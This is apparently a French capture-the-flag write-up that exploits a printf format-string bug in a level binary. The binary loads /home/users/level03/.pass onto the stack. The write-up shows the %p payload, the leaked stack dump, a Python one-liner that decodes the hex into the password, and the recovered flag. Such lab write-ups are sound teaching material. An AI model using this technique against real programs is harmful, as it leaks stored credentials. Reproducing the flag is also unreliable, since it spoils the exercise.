Au lancement le binaire nous demande user + mdp

On peut voir qu'il fopen + read le fichier /home/users/level03/.pass puis le met sur la stack.

Ensuite il y a un printf qui affiche notre username, on peut donc print la stack pour voir ce qu'il s'y passe



--[ Username: AAAA %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p
--[ Password: *****************************************
AAAA 0x7fffffffe4d0 (nil) 0x70 0x2a2a2a2a2a2a2a2a 0x2a2a2a2a2a2a2a2a 0x7fffffffe6c8 0x1f7ff9a08 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x70 (nil) (nil) (nil) (nil) (nil) (nil) (nil) (nil) 0x100000000 (nil) 0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d (nil) 0x2070252041414141 0x7025207025207025 0x2520702520702520 0x2070252070252070  does not have access!







0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d
voici notre mdp

“756e505234376848”.decode(“hex”)[::-1] + “45414a3561733951”.decode(“hex”)[::-1] + “377a7143574e6758”.decode(“hex”)[::-1] + “354a35686e475873”.decode(“hex”)[::-1]+ “48336750664b394d”.decode(“hex”)[::-1]

== Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H
